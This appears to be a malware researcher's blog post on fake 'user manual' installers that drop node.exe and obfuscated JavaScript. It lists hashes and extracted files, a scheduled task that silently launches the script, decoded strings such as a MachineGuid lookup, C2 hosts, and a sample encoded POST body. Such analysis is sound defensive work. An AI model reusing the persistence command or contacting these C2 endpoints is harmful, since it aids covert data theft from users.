EvilAI: Fake Manual Software

UPDATE: September 18, 2025 

Another variant of what I've been looking at over the past week caught my eye today. Just wanted to give a real quick review of this, showing the POST encoding/decoding process.

OpenMyManual.exe (9f948215b9ee7e7496ce3bc9e46fda56b50cc8905b88535225c7651007f660d5)

Drops a copy of node.exe as well as a malicious JS file (2cd68ea7f02e8cfaded52d64c2cb71b64560b3799c948960db37e827618ff22d)

Like in my last post, you can run this through a js deobfuscato, make a couple quick edits, and the run node.exe with the --insert-brk to set breakpoints and step through the program:

What you eventually get is the C2 (api.evil.com/nss), the POST data, and how that POST data is being encoded and sent out to the C2. The 16 byte buffer is the XOR key, the 176 byte buffer is what becomes the Base64 (shown here as _0xda4df9). 

To date, I have not got a response back from any of these C2's. I've looked at several of these, they all so far have a pattern like ^api.[a-zA-Z0-0]{18}\.com$

/nss has been consistent as well. In wireshark I get an RST back from these. 

 

Analysis of hxxps://download.totalusermanuals.com/totalusermanuals[.]exe

Hash:10bd14c9fc9e9f6025c839f8fa2adc04

This one has another highly obfuscated script that can be partially decoded using https://obf-io.deobfuscate.io/

This version has more anti-analysis in place, and so far I haven't decoded the outgoing POST, but have decoded a number of strings in the JS.

This latest Fake Manual seems to have some things in common with JustAskJacky, based on strings and obfuscation.

.\innounp.exe -x -m .\totalusermanuals.exe

innounp - the Inno Setup Unpacker, Version 2.65.1 (8/25/2025)

Inno Setup archive: totalusermanuals.exe
Inno Setup version detected: 6.3.0 (Unicode)

#1 {app}\script.js - extracted
#2 {app}\task.xml - extracted
#3 {app}\node\CHANGELOG.md - extracted
#4 {app}\node\corepack - extracted
#5 {app}\node\corepack.cmd - extracted
#6 {app}\node\install_tools.bat - extracted
#7 {app}\node\LICENSE - extracted
#8 {app}\node\node.exe - extracted
#9 {app}\node\nodevars.bat - extracted
#10 {app}\node\npm - extracted
#11 {app}\node\npm.cmd - extracted
#12 {app}\node\npx - extracted
#13 {app}\node\npx.cmd - extracted
#14 {app}\node\README.md - extracted
#15 {app}\Microsoft.Web.WebView2.Core.dll - extracted">

Task created from Task.xml

task.xml
Exec
Command C:\Windows\System32\cmd.exe
Arguments /C start "" /min "%app%\node\node.exe" "%app%\script.js"
WorkingDirectory %app%\node

t: "get.latest-manuals.com",

Decoded Strings

Software\Microsoft\Cryptography
MachineGuid
0.2.1
Content-Type
text/plain
Content-Length
POST
utf8
data
end
error
base64
/log.txt
0.2.1
=_=
app
asdc
#version#
#a#
{ "ver": #version#, "a": #argString# }
exports
require
module
__filename
__dirname
//# sourceURL=
./temp.js
Function

Example POST traffic:

[OUTGOING REQUEST] POST get.latest-manuals.com / bodyLen=724
[OUTGOING BODY (utf8)]
B1Y09cELENhQwz5loObtWnx0BNf7KUz6cu8cVILczyElehbH4zEy+HLvHFaC3M8GW3QY1/UpKvoM4RxJgtPPYCUgFtnjPTLicqYcSYLRz2AlJBbZ4zMy4nKfYkeMxNR4PXRo1+MnMulg4QRHmsTBeDZnFs/jKzL0cvIMR5rE3XgrdAXG4zEy9nLvHFSUxNd4NXQY1/A+MuJy7RxJgtfbeD10BdftKSHvcvkcSYLKz2s/dA7X4Sk8+mH6HF+CurF4K3QGxeMxMoRy4RJHktfPYCU3FtnjOSL6auFiOYLKz2g0dA7XnSky9HLxCkeaxNd4K3QGwOMxMvhy7xxXlsTXeCR0GNfzPDLicqIcSYLU1Xg9dEbX7Ski4XL5HAKCys9pN3QO15IpPPpj8hxfgpLPdiVlBtf7KWL6fOENVoLczzMlehbG9Skq+j7hEkeT089gJTEW2eM4Jvpq4R1HjMTebSVsFtXjJzLraOEER93EwXg0bxbP41cy+nzhYVXY1NVuZDMN1/spcagg4RJH/9aVaz9iV8XzKSr6NvdYVpSF2Wkqb1aW8CYkuWmiEweV04t3NjIAkaUyJ71gpgZdgsrPBTcuB5HwMiG9cvkcUcOE3WJlYgDYoDtxuX33DAbEy4xtZG8ZkfU+Jbo08AdVlIDUeCt0a8W5OXS8ZPVfR5rE3XQ1eAXX7SlP6CjyDwfBh9l4PXQFxe87Pupm8g5Vgps=

Additionally I ran across these one as well:

anyproductmanual.exe 895e24527b10897fbfdf661d26d15e70

manualreaderpro.exe 287de08218ea23f7e795da3caf525bb6

manualshq.exe 71bddf977d92f3ad92ec678b0fa226da

AllManualsReader_oc.exe c7b01fbde712d64d869225543b5f2e32

completeusermanuales.exe b264dc54f1055eb4c1164cf1d05d15db

Related Posts:

EvilAI: Fake online speedtests